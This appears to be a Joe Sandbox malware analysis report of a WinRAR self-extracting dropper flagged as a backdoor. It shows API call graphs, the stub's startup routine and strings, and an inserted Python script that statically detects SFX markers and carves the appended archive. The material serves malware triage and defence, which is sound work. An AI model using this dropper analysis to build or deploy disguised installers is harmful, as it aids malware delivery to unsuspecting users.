_free 20 API calls 24217->24219 24219->24214 24221 7fb1f2 24253 7f895a 20 API calls __dosmaperr 24221->24253 24223 7fb23b 24223->24217 24254 7fadf1 26 API calls 24223->24254 24224 7fb20f 24224->24223 24225 7f84de _free 20 API calls 24224->24225 24225->24223 24228 7fb2ba ___DestructExceptionObject 24227->24228 24229 7f8fa5 FindHandlerForForeignException 38 API calls 24228->24229 24234 7fb2c4 24229->24234 24231 7fb348 ___DestructExceptionObject 24231->24211 24234->24231 24235 7f84de _free 20 API calls 24234->24235 24255 7f8566 38 API calls _abort 24234->24255 24256 7fa3f1 EnterCriticalSection 24234->24256 24257 7fb33f LeaveCriticalSection _abort 24234->24257 24235->24234 24237 7f3dd6 __cftof 38 API calls 24236->24237 24238 7faf2d 24237->24238 24239 7faf4e 24238->24239 24240 7faf3c GetOEMCP 24238->24240 24241 7faf65 24239->24241 24242 7faf53 GetACP 24239->24242 24240->24241 24241->24214 24241->24215 24242->24241 24244 7faf1b 40 API calls 24243->24244 24245 7fb36f 24244->24245 24248 7fb3c0 IsValidCodePage 24245->24248 24250 7fb376 24245->24250 24252 7fb3e5 ___scrt_fastfail 24245->24252 24246 7eec4a DloadUnlock 5 API calls 24247 7fb1ea 24246->24247 24247->24221 24247->24224 24249 7fb3d2 GetCPInfo 24248->24249 24248->24250 24249->24250 24249->24252 24250->24246 24258 7faff4 GetCPInfo 24252->24258 24253->24217 24254->24217 24256->24234 24257->24234 24259 7fb0d8 24258->24259 24261 7fb02e 24258->24261 24263 7eec4a DloadUnlock 5 API calls 24259->24263 24268 7fc099 24261->24268 24265 7fb184 24263->24265 24265->24250 24267 7fa275 __vswprintf_c_l 43 API calls 24267->24259 24269 7f3dd6 __cftof 38 API calls 24268->24269 24270 7fc0b9 MultiByteToWideChar 24269->24270 24272 7fc0f7 24270->24272 24273 7fc18f 24270->24273 24275 7f8518 __onexit 21 API calls 24272->24275 24279 7fc118 __vsnwprintf_l ___scrt_fastfail 24272->24279 24274 7eec4a DloadUnlock 5 API calls 24273->24274 24276 7fb08f 24274->24276 24275->24279 24282 7fa275 24276->24282 24277 7fc189 24287 7fa2c0 20 API calls _free 
24277->24287 24279->24277 24280 7fc15d MultiByteToWideChar 24279->24280 24280->24277 24281 7fc179 GetStringTypeW 24280->24281 24281->24277 24283 7f3dd6 __cftof 38 API calls 24282->24283 24284 7fa288 24283->24284 24288 7fa058 24284->24288 24287->24273 24290 7fa073 __vswprintf_c_l 24288->24290 24289 7fa099 MultiByteToWideChar 24291 7fa0c3 24289->24291 24302 7fa24d 24289->24302 24290->24289 24294 7f8518 __onexit 21 API calls 24291->24294 24300 7fa0e4 __vsnwprintf_l 24291->24300 24292 7eec4a DloadUnlock 5 API calls 24293 7fa260 24292->24293 24293->24267 24294->24300 24295 7fa12d MultiByteToWideChar 24296 7fa199 24295->24296 24297 7fa146 24295->24297 24324 7fa2c0 20 API calls _free 24296->24324 24315 7fa72c 24297->24315 24300->24295 24300->24296 24302->24292 24303 7fa1a8 24305 7f8518 __onexit 21 API calls 24303->24305 24308 7fa1c9 __vsnwprintf_l 24303->24308 24304 7fa170 24304->24296 24306 7fa72c __vswprintf_c_l 11 API calls 24304->24306 24305->24308 24306->24296 24307 7fa23e 24323 7fa2c0 20 API calls _free 24307->24323 24308->24307 24309 7fa72c __vswprintf_c_l 11 API calls 24308->24309 24311 7fa21d 24309->24311 24311->24307 24312 7fa22c WideCharToMultiByte 24311->24312 24312->24307 24313 7fa26c 24312->24313 24325 7fa2c0 20 API calls _free 24313->24325 24326 7fa458 24315->24326 24319 7fa79c LCMapStringW 24320 7fa75c 24319->24320 24321 7eec4a DloadUnlock 5 API calls 24320->24321 24322 7fa15d 24321->24322 24322->24296 24322->24303 24322->24304 24323->24296 24324->24302 24325->24296 24327 7fa488 24326->24327 24330 7fa484 24326->24330 24327->24320 24333 7fa7b4 10 API calls 3 library calls 24327->24333 24328 7fa4a8 24328->24327 24331 7fa4b4 GetProcAddress 24328->24331 24330->24327 24330->24328 24334 7fa4f4 24330->24334 24332 7fa4c4 __crt_fast_encode_pointer 24331->24332 24332->24327 24333->24319 24335 7fa515 LoadLibraryExW 24334->24335 24339 7fa50a 24334->24339 24336 7fa54a 24335->24336 24337 7fa532 GetLastError 24335->24337 24336->24339 24340 7fa561 FreeLibrary 24336->24340 
24337->24336 24338 7fa53d LoadLibraryExW 24337->24338 24338->24336 24339->24330 24340->24339 24342 7ee360 24341->24342 24343 7e00d9 GetModuleHandleW 24342->24343 24344 7e0154 24343->24344 24345 7e00f0 GetProcAddress 24343->24345 24346 7e0484 GetModuleFileNameW 24344->24346 24449 7f70dd 42 API calls __vsnwprintf_l 24344->24449 24347 7e0109 24345->24347 24348 7e0121 GetProcAddress 24345->24348 24361 7e04a3 24346->24361 24347->24348 24348->24344 24350 7e0133 24348->24350 24350->24344 24351 7e03be 24351->24346 24352 7e03c9 GetModuleFileNameW CreateFileW 24351->24352 24353 7e03fc SetFilePointer 24352->24353 24354 7e0478 CloseHandle 24352->24354 24353->24354 24355 7e040c ReadFile 24353->24355 24354->24346 24355->24354 24358 7e042b 24355->24358 24358->24354 24360 7e0085 2 API calls 24358->24360 24359 7e04d2 CompareStringW 24359->24361 24360->24358 24361->24359 24362 7e0508 GetFileAttributesW 24361->24362 24363 7e0520 24361->24363 24440 7dacf5 24361->24440 24443 7e0085 24361->24443 24362->24361 24362->24363 24364 7e052a 24363->24364 24367 7e0560 24363->24367 24366 7e0542 GetFileAttributesW 24364->24366 24369 7e055a 24364->24369 24365 7e066f 24389 7e9da4 GetCurrentDirectoryW 24365->24389 24366->24364 24366->24369 24367->24365 24368 7dacf5 GetVersionExW 24367->24368 24370 7e057a 24368->24370 24369->24367 24371 7e05e7 24370->24371 24372 7e0581 24370->24372 24373 7d400a _swprintf 51 API calls 24371->24373 24374 7e0085 2 API calls 24372->24374 24375 7e060f AllocConsole 24373->24375 24376 7e058b 24374->24376 24377 7e061c GetCurrentProcessId AttachConsole 24375->24377 24378 7e0667 ExitProcess 24375->24378 24379 7e0085 2 API calls 24376->24379 24450 7f35b3 24377->24450 24381 7e0595 24379->24381 24383 7dddd1 53 API calls 24381->24383 24382 7e063d GetStdHandle WriteConsoleW Sleep FreeConsole 24382->24378 24384 7e05b0 24383->24384 24385 7d400a _swprintf 51 API calls 24384->24385 24386 7e05c3 24385->24386 24387 7dddd1 53 API calls 24386->24387 24388 7e05d2 24387->24388 24388->24378 
24389->24088 24391 7e0085 2 API calls 24390->24391 24392 7ea349 OleInitialize 24391->24392 24393 7ea36c GdiplusStartup SHGetMalloc 24392->24393 24393->24090 24395 7e13d7 IsDBCSLeadByte 24394->24395 24395->24395 24396 7e13ef 24395->24396 24396->24092 24398 7ebc8e 24397->24398 24399 7ebda4 24398->24399 24400 7e179d CharUpperW 24398->24400 24452 7decad 80 API calls ___scrt_fastfail 24398->24452 24399->24101 24399->24102 24400->24398 24403 7ee360 24402->24403 24404 7ed294 SetEnvironmentVariableW 24403->24404 24405 7ed2b7 24404->24405 24406 7ed2df 24405->24406 24407 7ed2d3 SetEnvironmentVariableW 24405->24407 24406->24095 24407->24406 24409 7eae0e 24408->24409 24410 7eae15 24408->24410 24453 7e9e1c FindResourceW 24409->24453 24412 7eae2a 24410->24412 24413 7eae1b GetObjectW 24410->24413 24414 7e9d1a 4 API calls 24412->24414 24413->24412 24415 7eae3d 24414->24415 24416 7eae80 24415->24416 24417 7eae5c 24415->24417 24418 7e9e1c 12 API calls 24415->24418 24427 7dd31c 24416->24427 24467 7e9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24417->24467 24420 7eae4d 24418->24420 24420->24417 24423 7eae53 DeleteObject 24420->24423 24421 7eae64 24468 7e9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24421->24468 24423->24417 24424 7eae6d 24469 7e9f5d 8 API calls ___scrt_fastfail 24424->24469 24426 7eae74 DeleteObject 24426->24416 24478 7dd341 24427->24478 24429 7dd328 24518 7dda4e GetModuleHandleW FindResourceW 24429->24518 24432 7e8835 24433 7ee24a new 8 API calls 24432->24433 24434 7e8854 24433->24434 24434->24114 24436 7ea3cc GdiplusShutdown OleUninitialize 24435->24436 24436->24130 24438->24120 24439->24128 24441 7dad09 GetVersionExW 24440->24441 24442 7dad45 24440->24442 24441->24442 24442->24361 24444 7ee360 24443->24444 24445 7e0092 GetSystemDirectoryW 24444->24445 24446 7e00aa 24445->24446 24447 7e00c8 24445->24447 24448 7e00bb LoadLibraryW 24446->24448 24447->24361 24448->24447 24449->24351 24451 7f35bb 24450->24451 24451->24382 24451->24451 24452->24398 24454 7e9e3e 
SizeofResource 24453->24454 24455 7e9e70 24453->24455 24454->24455 24456 7e9e52 LoadResource 24454->24456 24455->24410 24456->24455 24457 7e9e63 LockResource 24456->24457 24457->24455 24458 7e9e77 GlobalAlloc 24457->24458 24458->24455 24459 7e9e92 GlobalLock 24458->24459 24460 7e9f21 GlobalFree 24459->24460 24461 7e9ea1 __vswprintf_c_l 24459->24461 24460->24455 24462 7e9f1a GlobalUnlock 24461->24462 24470 7e9d7b GdipAlloc 24461->24470 24462->24460 24465 7e9eef GdipCreateHBITMAPFromBitmap 24466 7e9f05 24465->24466 24466->24462 24467->24421 24468->24424 24469->24426 24471 7e9d9a 24470->24471 24472 7e9d8d 24470->24472 24471->24462 24471->24465 24471->24466 24474 7e9b0f 24472->24474 24475 7e9b37 GdipCreateBitmapFromStream 24474->24475 24476 7e9b30 GdipCreateBitmapFromStreamICM 24474->24476 24477 7e9b3c 24475->24477 24476->24477 24477->24471 24479 7dd34b _wcschr __EH_prolog 24478->24479 24480 7dd37a GetModuleFileNameW 24479->24480 24481 7dd3ab 24479->24481 24482 7dd394 24480->24482 24520 7d99b0 24481->24520 24482->24481 24484 7d9653 79 API calls 24487 7dd7ab 24484->24487 24485 7dd407 24531 7f5a90 26 API calls 3 library calls 24485->24531 24487->24429 24488 7e3781 76 API calls 24490 7dd3db 24488->24490 24489 7dd41a 24532 7f5a90 26 API calls 3 library calls 24489->24532 24490->24485 24490->24488 24503 7dd627 24490->24503 24492 7dd563 24492->24503 24550 7d9d30 77 API calls 24492->24550 24496 7dd57d ___std_exception_copy 24497 7d9bf0 80 API calls 24496->24497 24496->24503 24500 7dd5a6 ___std_exception_copy 24497->24500 24499 7dd42c 24499->24492 24499->24503 24533 7d9e40 24499->24533 24541 7d9bf0 24499->24541 24549 7d9d30 77 API calls 24499->24549 24502 7dd5b2 ___std_exception_copy 24500->24502 24500->24503 24551 7e137a MultiByteToWideChar 24500->24551 24502->24503 24504 7dd72b 24502->24504 24507 7dda0a 24502->24507 24509 7dd9fa 24502->24509 24515 7e1596 WideCharToMultiByte 24502->24515 24555 7ddd6b 50 API calls __vsnprintf 24502->24555 24556 7f58d9 26 API calls 3 library 
calls 24502->24556 24503->24484 24552 7dce72 76 API calls 24504->24552 24506 7dd742 24510 7dd771 24506->24510 24512 7e3781 76 API calls 24506->24512 24557 7dce72 76 API calls 24507->24557 24509->24429 24553 7f5a90 26 API calls 3 library calls 24510->24553 24512->24506 24513 7dd78b 24554 7f5a90 26 API calls 3 library calls 24513->24554 24515->24502 24519 7dd32f 24518->24519 24519->24432 24521 7d99ba 24520->24521 24522 7d9a39 CreateFileW 24521->24522 24523 7d9a59 GetLastError 24522->24523 24524 7d9aaa 24522->24524 24525 7db66c 2 API calls 24523->24525 24526 7d9ae1 24524->24526 24528 7d9ac7 SetFileTime 24524->24528 24527 7d9a79 24525->24527 24526->24490 24527->24524 24529 7d9a7d CreateFileW GetLastError 24527->24529 24528->24526 24530 7d9aa1 24529->24530 24530->24524 24531->24489 24532->24499 24534 7d9e64 SetFilePointer 24533->24534 24535 7d9e53 24533->24535 24536 7d9e9d 24534->24536 24537 7d9e82 GetLastError 24534->24537 24535->24536 24558 7d6fa5 75 API calls 24535->24558 24536->24499 24537->24536 24539 7d9e8c 24537->24539 24539->24536 24559 7d6fa5 75 API calls 24539->24559 24542 7d9bfc 24541->24542 24545 7d9c03 24541->24545 24542->24499 24544 7d9c9e 24544->24542 24572 7d6f6b 75 API calls 24544->24572 24545->24542 24545->24544 24547 7d9cc0 24545->24547 24560 7d984e 24545->24560 24547->24542 24548 7d984e 5 API calls 24547->24548 24548->24547 24549->24499 24550->24496 24551->24502 24552->24506 24553->24513 24554->24503 24555->24502 24556->24502 24557->24509 24558->24534 24559->24536 24561 7d985c GetStdHandle 24560->24561 24562 7d9867 ReadFile 24560->24562 24561->24562 24563 7d9880 24562->24563 24568 7d98a0 24562->24568 24564 7d9989 GetFileType 24563->24564 24565 7d9887 24564->24565 24566 7d98a8 GetLastError 24565->24566 24567 7d98b7 24565->24567 24569 7d9895 24565->24569 24566->24567 24566->24568 24567->24568 24570 7d98c7 GetLastError 24567->24570 24568->24545 24571 7d984e GetFileType 24569->24571 24570->24568 24570->24569 24571->24568 24572->24542 24574 7f7430 
FindHandlerForForeignException 24573->24574 24575 7f7448 24574->24575 24576 7f757e _abort GetModuleHandleW 24574->24576 24595 7fa3f1 EnterCriticalSection 24575->24595 24578 7f743c 24576->24578 24578->24575 24607 7f75c2 GetModuleHandleExW 24578->24607 24579 7f74ee 24596 7f752e 24579->24596 24582 7f7450 24582->24579 24584 7f74c5 24582->24584 24615 7f7f30 20 API calls _abort 24582->24615 24587 7f74dd 24584->24587 24592 7f81f1 _abort 5 API calls 24584->24592 24585 7f750b 24599 7f753d 24585->24599 24586 7f7537 24616 801a19 5 API calls DloadUnlock 24586->24616 24588 7f81f1 _abort 5 API calls 24587->24588 24588->24579 24592->24587 24595->24582 24617 7fa441 LeaveCriticalSection 24596->24617 24598 7f7507 24598->24585 24598->24586 24618 7fa836 24599->24618 24602 7f756b 24605 7f75c2 _abort 8 API calls 24602->24605 24603 7f754b GetPEB 24603->24602 24604 7f755b GetCurrentProcess TerminateProcess 24603->24604 24604->24602 24606 7f7573 ExitProcess 24605->24606 24608 7f760f 24607->24608 24609 7f75ec GetProcAddress 24607->24609 24610 7f761e 24608->24610 24611 7f7615 FreeLibrary 24608->24611 24614 7f7601 24609->24614 24612 7eec4a DloadUnlock 5 API calls 24610->24612 24611->24610 24613 7f7628 24612->24613 24613->24575 24614->24608 24615->24584 24617->24598 24619 7fa85b 24618->24619 24623 7fa851 24618->24623 24620 7fa458 __dosmaperr 5 API calls 24619->24620 24620->24623 24621 7eec4a DloadUnlock 5 API calls 24622 7f7547 24621->24622 24622->24602 24622->24603 24623->24621 24883 7eacd0 100 API calls 24935 7e19d0 26 API calls std::bad_exception::bad_exception 24884 7ea8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24886 7eeac0 27 API calls pre_c_initialization 24939 7febc1 21 API calls __vswprintf_c_l 24940 7e97c0 10 API calls 24888 7f9ec0 21 API calls 24941 7fb5c0 GetCommandLineA GetCommandLineW 24889 800040 IsProcessorFeaturePresent 24635 7f76bd 24636 7f76cc 24635->24636 24637 7f76e8 24635->24637 24636->24637 24639 7f76d2 24636->24639 24638 7fb290 51 API calls 24637->24638 24640 
7f76ef GetModuleFileNameA 24638->24640 24658 7f895a 20 API calls __dosmaperr 24639->24658 24642 7f7713 24640->24642 24660 7f77e1 38 API calls 24642->24660 24643 7f76d7 24659 7f8839 26 API calls ___std_exception_copy 24643->24659 24645 7f76e1 24647 7f7730 24661 7f7956 20 API calls 2 library calls 24647->24661 24649 7f773d 24650 7f7746 24649->24650 24651 7f7752 24649->24651 24662 7f895a 20 API calls __dosmaperr 24650->24662 24663 7f77e1 38 API calls 24651->24663 24654 7f7768 24656 7f84de _free 20 API calls 24654->24656 24657 7f774b 24654->24657 24655 7f84de _free 20 API calls 24655->24645 24656->24657 24657->24655 24658->24643 24659->24645 24660->24647 24661->24649 24662->24657 24663->24654 24666 7f79b7 24667 7fb290 51 API calls 24666->24667 24668 7f79c9 24667->24668 24677 7fb610 GetEnvironmentStringsW 24668->24677 24671 7f79d4 24673 7f84de _free 20 API calls 24671->24673 24674 7f7a09 24673->24674 24675 7f79df 24676 7f84de _free 20 API calls 24675->24676 24676->24671 24678 7fb627 24677->24678 24688 7fb67a 24677->24688 24681 7fb62d WideCharToMultiByte 24678->24681 24679 7f79ce 24679->24671 24689 7f7a0f 26 API calls 3 library calls 24679->24689 24680 7fb683 FreeEnvironmentStringsW 24680->24679 24682 7fb649 24681->24682 24681->24688 24683 7f8518 __onexit 21 API calls 24682->24683 24684 7fb64f 24683->24684 24685 7fb656 WideCharToMultiByte 24684->24685 24686 7fb66c 24684->24686 24685->24686 24687 7f84de _free 20 API calls 24686->24687 24687->24688 24688->24679 24688->24680 24689->24675 24891 7d16b0 84 API calls 24690 7f90b0 24698 7fa56f 24690->24698 24694 7f90d9 24695 7f90cc 24695->24694 24706 7f90e0 11 API calls 24695->24706 24697 7f90c4 24699 7fa458 __dosmaperr 5 API calls 24698->24699 24700 7fa596 24699->24700 24701 7fa5ae TlsAlloc 24700->24701 24702 7fa59f 24700->24702 24701->24702 24703 7eec4a DloadUnlock 5 API calls 24702->24703 24704 7f90ba 24703->24704 24704->24697 24705 7f9029 20 API calls 2 library calls 24704->24705 24705->24695 24706->24697 24707 7fa3b0 24708 
7fa3bb 24707->24708 24710 7fa3e4 24708->24710 24712 7fa3e0 24708->24712 24713 7fa6ca 24708->24713 24720 7fa410 DeleteCriticalSection 24710->24720 24714 7fa458 __dosmaperr 5 API calls 24713->24714 24715 7fa6f1 24714->24715 24716 7fa70f InitializeCriticalSectionAndSpinCount 24715->24716 24717 7fa6fa 24715->24717 24716->24717 24718 7eec4a DloadUnlock 5 API calls 24717->24718 24719 7fa726 24718->24719 24719->24708 24720->24712 24892 7f1eb0 6 API calls 3 library calls 24893 7ee4a2 38 API calls 2 library calls 24895 7d96a0 79 API calls 24944 7fe9a0 51 API calls 24898 7ea89d 78 API calls 24899 7dea98 FreeLibrary 24945 7f2397 48 API calls 24743 7ed997 24744 7ed89b 24743->24744 24745 7edf59 ___delayLoadHelper2@8 19 API calls 24744->24745 24745->24744 24901 7e7090 114 API calls 24902 7ecc90 70 API calls 24946 7ea990 97 API calls 24947 7e9b90 GdipCloneImage GdipAlloc 24748 7ed891 19 API calls ___delayLoadHelper2@8 24948 7f9b90 21 API calls 2 library calls 24814 7d1385 82 API calls 3 library calls 24905 7fac0e 27 API calls DloadUnlock 24951 7f5780 QueryPerformanceFrequency QueryPerformanceCounter

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 007E00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 007E00E4
                                                  • Part of subcall function 007E00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007E00F6
                                                  • Part of subcall function 007E00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007E0127
                                                  • Part of subcall function 007E9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 007E9DAC
                                                  • Part of subcall function 007EA335: OleInitialize.OLE32(00000000), ref: 007EA34E
                                                  • Part of subcall function 007EA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 007EA385
                                                  • Part of subcall function 007EA335: SHGetMalloc.SHELL32(00818430), ref: 007EA38F
                                                  • Part of subcall function 007E13B3: GetCPInfo.KERNEL32(00000000,?), ref: 007E13C4
                                                  • Part of subcall function 007E13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 007E13D8
                                                • GetCommandLineW.KERNEL32 ref: 007ED61C
                                                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 007ED643
                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 007ED654
                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 007ED68E
                                                  • Part of subcall function 007ED287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 007ED29D
                                                  • Part of subcall function 007ED287: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 007ED2D9
                                                • CloseHandle.KERNEL32(00000000), ref: 007ED697
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe,00000800), ref: 007ED6B2
                                                • SetEnvironmentVariableW.KERNELBASE(sfxname,C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe), ref: 007ED6BE
                                                • GetLocalTime.KERNEL32(?), ref: 007ED6C9
                                                • _swprintf.LIBCMT ref: 007ED708
                                                • SetEnvironmentVariableW.KERNELBASE(sfxstime,?), ref: 007ED71A
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 007ED721
                                                • LoadIconW.USER32(00000000,00000064), ref: 007ED738
                                                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 007ED789
                                                • Sleep.KERNEL32(?), ref: 007ED7B7
                                                • DeleteObject.GDI32 ref: 007ED7F0
                                                • DeleteObject.GDI32(?), ref: 007ED800
                                                • CloseHandle.KERNEL32 ref: 007ED843
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                • API String ID: 788466649-2343999045
                                                • Opcode ID: f155a52fdd05bde8f568d6676ac87085970f69f3fb1a9dce0bc39e20dba7815c
                                                • Instruction ID: b7a86d8f4647f7bd99585f7fea925e5c48d77fc0d36b2e5874c9681a13e05bb1
                                                • Opcode Fuzzy Hash: f155a52fdd05bde8f568d6676ac87085970f69f3fb1a9dce0bc39e20dba7815c
                                                • Instruction Fuzzy Hash: DF61A071901391EFD370ABA6EC4AA6A3BACFF48740F004429F545D22A1DFBC9D44CB66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

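The function above is the SFX stub's startup routine: it opens the named file mapping winrarsfxmappingfile.tmp with FILE_MAP_ALL_ACCESS (0x000F001F), exports sfxcmd, sfxpar, sfxname and sfxstime into the environment, and shows the STARTDLG dialog before anything is extracted. The payload a WinRAR SFX drops is the RAR archive appended after this stub, and the SFX commands (what to run after extraction) live in that archive's comment, so triage can recognise the stub and carve the archive statically instead of running the dropper. The Python below is an added example, not Joe Sandbox output and not WinRAR code: the marker strings are the String IDs listed in this report, the RAR signatures come from the public RAR format, and the 0x400 search start plus the sample bytes are constructed assumptions.

```python
"""Static triage of a suspected WinRAR SFX dropper (added example)."""
from dataclasses import dataclass, field
from typing import List, Tuple

# Markers taken from this report's String IDs (stored as UTF-16LE in the stub).
SFX_MARKERS = (
    "winrarsfxmappingfile.tmp",
    "STARTDLG",
    "LICENSEDLG",
    "sfxname",
    "sfxstime",
    "__tmp_rar_sfx_access_check_%u",
)

# Archive signatures from the public RAR format: 4.x and 5.x.
RAR4_SIG = b"Rar!\x1a\x07\x00"
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"

# Assumption: skip the PE headers when hunting for the appended archive;
# the real stub analysed here is hundreds of KiB, so this is conservative.
STUB_MIN_SIZE = 0x400


@dataclass
class SfxTriage:
    markers_found: List[str] = field(default_factory=list)
    archive_offset: int = -1
    archive_version: str = ""

    @property
    def looks_like_winrar_sfx(self) -> bool:
        # Require the mapping-file name plus one more marker so a stray
        # dialog name alone does not flag the file.
        return ("winrarsfxmappingfile.tmp" in self.markers_found
                and len(self.markers_found) >= 2)


def find_markers(data: bytes) -> List[str]:
    """Report which SFX marker strings occur (UTF-16LE or ASCII) in the file."""
    found = []
    for m in SFX_MARKERS:
        if m.encode("utf-16-le") in data or m.encode("ascii") in data:
            found.append(m)
    return found


def find_archive(data: bytes, search_from: int = 0) -> Tuple[int, str]:
    """Return (offset, version) of the earliest RAR signature at/after search_from."""
    best = (-1, "")
    for sig, ver in ((RAR5_SIG, "RAR5"), (RAR4_SIG, "RAR4")):
        off = data.find(sig, search_from)
        if off != -1 and (best[0] == -1 or off < best[0]):
            best = (off, ver)
    return best


def triage(data: bytes) -> SfxTriage:
    t = SfxTriage(markers_found=find_markers(data))
    t.archive_offset, t.archive_version = find_archive(data, STUB_MIN_SIZE)
    return t


def carve_archive(data: bytes) -> bytes:
    """Return the appended archive bytes (feed to unrar/7z with list-only flags first)."""
    off, _ = find_archive(data, STUB_MIN_SIZE)
    return data[off:] if off != -1 else b""


def build_sample() -> bytes:
    """Constructed test input, not the real sample: fake stub + RAR5 header."""
    stub = bytearray(b"MZ" + b"\x00" * (STUB_MIN_SIZE - 2))
    for m in ("winrarsfxmappingfile.tmp", "STARTDLG", "sfxname", "sfxstime"):
        stub += m.encode("utf-16-le") + b"\x00\x00"
    stub += b"\x00" * 64
    return bytes(stub) + RAR5_SIG + b"\x01\x02\x03\x04fake-archive-body"


if __name__ == "__main__":
    sample = build_sample()
    result = triage(sample)
    print(result, "carved", len(carve_archive(sample)), "bytes")
```

Run it against the carved bytes with an archive lister (for example `unrar lt`) to read the SFX comment and see which dropped file the stub would launch; listing does not run the SFX script, whereas executing the original .exe does.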
                                                 Control-flow Graph: [graph rendering omitted; basic blocks 0x7e9e1c-0x7e9f32, each marked executed or not executed]
                                                APIs
                                                • FindResourceW.KERNEL32(007EAE4D,PNG,?,?,?,007EAE4D,00000066), ref: 007E9E2E
                                                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,007EAE4D,00000066), ref: 007E9E46
                                                • LoadResource.KERNEL32(00000000,?,?,?,007EAE4D,00000066), ref: 007E9E59
                                                • LockResource.KERNEL32(00000000,?,?,?,007EAE4D,00000066), ref: 007E9E64
                                                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,007EAE4D,00000066), ref: 007E9E82
                                                • GlobalLock.KERNEL32(00000000,?,?,?,?,?,007EAE4D,00000066), ref: 007E9E93
                                                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 007E9EFC
                                                • GlobalUnlock.KERNEL32(00000000), ref: 007E9F1B
                                                • GlobalFree.KERNEL32(00000000), ref: 007E9F22
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                                • String ID: PNG
                                                • API String ID: 4097654274-364855578
                                                • Opcode ID: 95174eb4e536c6a90e730211c88f034fc68c2657161c3cb85985a62c8b8366c4
                                                • Instruction ID: 0e70d99596062a49609ac3f09731c52490d254e43a41fbe403705331c1d5b968
                                                • Opcode Fuzzy Hash: 95174eb4e536c6a90e730211c88f034fc68c2657161c3cb85985a62c8b8366c4
                                                • Instruction Fuzzy Hash: 2C31A272205746AFC7119F62DC4896BBFADFF8D751B044518FA02D2260EB75DC00CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                 Control-flow Graph: [graph rendering omitted; basic blocks 0x7da5f4-0x7da774, each marked executed or not executed]
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,007DA4EF,000000FF,?,?), ref: 007DA628
                                                • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,007DA4EF,000000FF,?,?), ref: 007DA65E
                                                • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,007DA4EF,000000FF,?,?), ref: 007DA66A
